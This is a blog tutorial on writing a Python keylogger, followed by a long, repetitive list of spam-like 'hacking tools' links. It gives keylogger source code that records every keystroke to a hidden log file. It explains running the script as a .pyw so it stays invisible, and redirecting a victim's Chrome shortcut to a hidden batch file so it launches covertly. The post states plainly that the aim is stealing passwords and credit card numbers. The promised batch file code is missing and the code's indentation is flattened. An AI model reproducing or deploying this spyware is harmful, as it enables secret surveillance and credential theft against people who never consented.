Friday 26 January 2024

How To Make A Simple And Powerful Keylogger Using Python

A keylogger is a computer program which can be written using any computer programming language such as c++ when you install it on a Victim system it can keep the records of every keystroke in a text file. Keylogger is mainly used to steal confidential data such as passwords, credit card numbers etc.

How to make a python keylogger?

A keylogger can be programmed using any programming language such as c++, java, c# e.tc. For this tutorial, I will use python to make a keylogger, because python is flexible, powerful and simple to understand even a non-programmer can use python to make a keylogger.
Requirements to create a python keylogger
  • Computer With Operating system: Windows, Mac os or Linux
  • Python must be installed on the system
  • Pip (Python index package ) you will need this to install python software packages.
  • Pypiwin32 and PyHook packages
  • Basic understanding of computers
You will learn to install these things one by one. If you have already installed and configured the python development kit feel free to skip Part 1.
Part 1: Downloading Python and pip, setting up the environment to create the keylogger.Step 1:
Download python development kit by clicking here.
Choose python 2.7 because I am using this version. It is ok if you have a different version of python this method will work on every version of python.
Step 2:
Installation of python is pretty simple.Open the python setup file, Mark the checkboxes Very important else you have to set the python path manually, and click on Install Now.
Step 3:
You need Pypiwin32 and PyHook python packages to create python keylogger. To install these packages you need pip, you can install Pypiwin32 and PyHook without using pip which is not recommended.
To download pip go to https://pip.pypa.io/en/stable/installing/ and Save link as by right clicking on get-pip.py. when the download is done, just run the get-pip.py file.
Now you need to set the Variable path for pip to do this right click on the computer icon and choose properties.
Now click on the Advanced system settings
Choose Environment Variables.
Choose New, Set the Variable name: PATH and Variable value as C:\Python27\Scripts
Click on ok.
Part 2: Installing Pypiwin32 and PyHook python Packages using pip:
Open Command Prompt(CMD) and type: pip installs Pypiwin32 press the Enter Key, wait for the installation to complete. After the Pypiwin32 package installation type: pip install PyHook press the Enter Key and wait for the installation to complete.When done close the Command Prompt.
Part 3: Creating and testing the python keylogger:
Now you have configured your environment and installed all the necessary packages, let's start creating the keylogger. Click on the start menu and scroll down until you find Python 2.7, run python IDLE(GUI) by clicking on it.
Go to the File, from the drop-down menu choose New file.

Python Keylogger source code:

Copy these lines of code and paste into the new file. Modify the directory in the second line of code to your own location e.g 'C:\test\log.txt' this will create a folder named test in C save the log.txt file there when the Keylogger start.
import pyHook, pythoncom, sys, logging
file_log='F:\\test\\log.txt'
def onKeyboardEvent(event):
logging.basicConfig(filename=file_log,level=logging.DEBUG,format='%(message)s')
chr(event.Ascii)
logging.log(10,chr(event.Ascii))
return True
hooks_manager=pyHook.HookManager()
hooks_manager.KeyDown=onKeyboardEvent
hooks_manager.HookKeyboard()
pythoncom.PumpMessages()
Save your file as a test.pyw at any location you want, the .pyw extension is very important because of it the python keylogger will run in the background without notifying the user.
The Python Keylogger is now completed you can test it out by opening it and typing some text in your browser, go to the log.txt file which is in the F:\test\log.txt on my PC. You will find your log.txt file in C:\test\log.txt.But what if you want to test it on someone else computer? you want to run it without the user knowing that it has been launched, this can be done by attaching it to the program that the victim always uses such as Google Chrome.
Let's make the python keylogger auto-launchable by attaching it the Google Chrome.
Copy the following code and paste into notepad. Save it by giving .bat extension e.g launch.bat in a hidden location, e.g c:\test\launch.bat
Now right click on the google chrome desktop shortcut icon and click on properties. You will see a field called Target. Change the target field to the batch file launch.bat directory that you created. let's say you have saved your launch.bat file in a test folder in C, Then change the target field with "C:\test\launch.bat". Now, whenever the user opens chrome the keylogger will run automatically.
Related posts
  1. Hacker Tools Apk
  2. Pentest Box Tools Download
  3. Tools 4 Hack
  4. Hak5 Tools
  5. Pentest Tools Port Scanner
  6. Hacking Tools Kit
  7. Hacker Tools Github
  8. Beginner Hacker Tools
  9. Hacking Tools For Kali Linux
  10. Usb Pentest Tools
  11. Hacker Tools 2019
  12. Pentest Tools Kali Linux
  13. Hacking Tools Github
  14. Hacker Tools For Ios
  15. Hacking Tools For Windows 7
  16. Hacker Tools Free
  17. Hacking Tools For Pc
  18. Hack Website Online Tool
  19. Hackers Toolbox
  20. Install Pentest Tools Ubuntu
  21. Hack Tools 2019
  22. Hacker Tools 2020
  23. Hack Tools Pc
  24. Termux Hacking Tools 2019
  25. Pentest Tools Windows
  26. Hacker Tools Apk Download
  27. Blackhat Hacker Tools
  28. Hacker Tools Free
  29. Blackhat Hacker Tools
  30. Hacker Tools Hardware
  31. Pentest Tools For Mac
  32. How To Hack
  33. Hacking Tools
  34. Pentest Tools For Mac
  35. Hacking Tools Windows
  36. Hack Rom Tools
  37. Hack Tool Apk
  38. Hack Tools Mac
  39. Wifi Hacker Tools For Windows
  40. Hack Tools
  41. Pentest Tools Alternative
  42. Hacker Tools List
  43. Hacker Tools List
  44. Hack Website Online Tool
  45. Install Pentest Tools Ubuntu
  46. Hack Tools Github
  47. Ethical Hacker Tools
  48. Pentest Tools Windows
  49. Pentest Tools For Android
  50. Hack Rom Tools
  51. Hacking Tools Software
  52. Best Hacking Tools 2020
  53. Install Pentest Tools Ubuntu
  54. Hacker Tools For Ios
  55. Hacker Tools Free
  56. Wifi Hacker Tools For Windows
  57. Hacking Tools Windows 10
  58. Pentest Tools Kali Linux
  59. Hacking Tools 2019
  60. Pentest Tools Framework
  61. Pentest Tools Apk
  62. Nsa Hacker Tools
  63. Pentest Tools For Ubuntu
  64. Hacking Tools Download
  65. Hacker Security Tools
  66. Pentest Tools Url Fuzzer
  67. Hacking Tools For Windows 7
  68. Pentest Tools Github
  69. Pentest Tools Framework
  70. Hacker Tools Software
  71. Pentest Tools Github
  72. Hacking Tools For Kali Linux
  73. Pentest Tools Framework
  74. Computer Hacker
  75. Hacker Tools Hardware
  76. Easy Hack Tools
  77. Hacks And Tools
  78. Hacker Tools 2020
  79. Pentest Tools Tcp Port Scanner
  80. Hack Tool Apk
  81. How To Install Pentest Tools In Ubuntu
  82. Nsa Hack Tools
  83. Hack Tools For Pc
  84. Hacking Tools For Games
  85. Tools For Hacker
  86. Hack Tools For Games
  87. Hacker Hardware Tools
  88. Hacking Tools
  89. Hack Tools 2019
  90. Usb Pentest Tools
  91. Hacker Search Tools
  92. Pentest Box Tools Download
  93. Hack App
  94. Hacking Tools For Windows Free Download
  95. Hacking Tools Hardware
  96. Underground Hacker Sites
  97. Pentest Tools Kali Linux
  98. Hack Apps
  99. Hacker Tools 2019
  100. Computer Hacker
  101. Hackers Toolbox
  102. Hacking Tools Mac
  103. Free Pentest Tools For Windows
  104. Nsa Hacker Tools
  105. Pentest Tools Kali Linux
  106. What Is Hacking Tools
  107. Pentest Tools Subdomain
  108. World No 1 Hacker Software
  109. Hacking Tools
  110. Hacking Tools Pc
  111. Hacking App
  112. Pentest Tools For Windows
  113. Hacker Tools
  114. Hacking Tools For Mac
  115. Nsa Hack Tools Download
  116. Hacker Tools Free Download
  117. Hack And Tools
  118. Hack Tools For Pc
  119. Hacking Tools And Software
  120. Hacking Tools Windows 10
  121. Game Hacking
  122. Tools 4 Hack
  123. Tools Used For Hacking
  124. What Is Hacking Tools
  125. Hacker Tools Software
  126. Termux Hacking Tools 2019
  127. What Is Hacking Tools
  128. Best Hacking Tools 2019
  129. Pentest Automation Tools
  130. Pentest Tools Alternative
  131. Pentest Tools Windows
  132. Hacker Tools Software
  133. Pentest Tools Linux
  134. Pentest Tools Github
  135. Pentest Tools Url Fuzzer
  136. Hack Tools Download
  137. Pentest Tools Apk
  138. Hacking Tools For Mac
  139. Pentest Tools Free
  140. Pentest Tools For Ubuntu
  141. Hacker Tools For Mac
  142. Hack Tools For Pc
  143. Hacking Tools For Beginners
  144. Hacking Tools Mac
  145. Hacker Hardware Tools
  146. Hacker Tools 2019
  147. Pentest Tools Review
  148. Pentest Tools Online
  149. What Is Hacking Tools
  150. Pentest Tools Bluekeep
  151. Hack Tools For Games
  152. Hack App
  153. Nsa Hacker Tools
  154. Hacking Tools Name
  155. Hacker Tool Kit
  156. How To Install Pentest Tools In Ubuntu
  157. Hacker Tools Free Download
  158. Hack Tools For Windows
  159. Hack Tool Apk No Root
  160. Hacking Tools For Pc
  161. Tools For Hacker
  162. Hacking App
  163. How To Make Hacking Tools
  164. Hacker
  165. Hacking Tools Github
  166. Pentest Tools Github
  167. New Hacker Tools
  168. What Are Hacking Tools
  169. Pentest Tools Open Source
  170. Pentest Tools Windows
  171. Computer Hacker
  172. Pentest Tools Alternative
  173. New Hacker Tools
  174. Pentest Tools
  175. Pentest Tools Linux
  176. Hackrf Tools
  177. Install Pentest Tools Ubuntu
  178. Github Hacking Tools

0 comments:

Post a Comment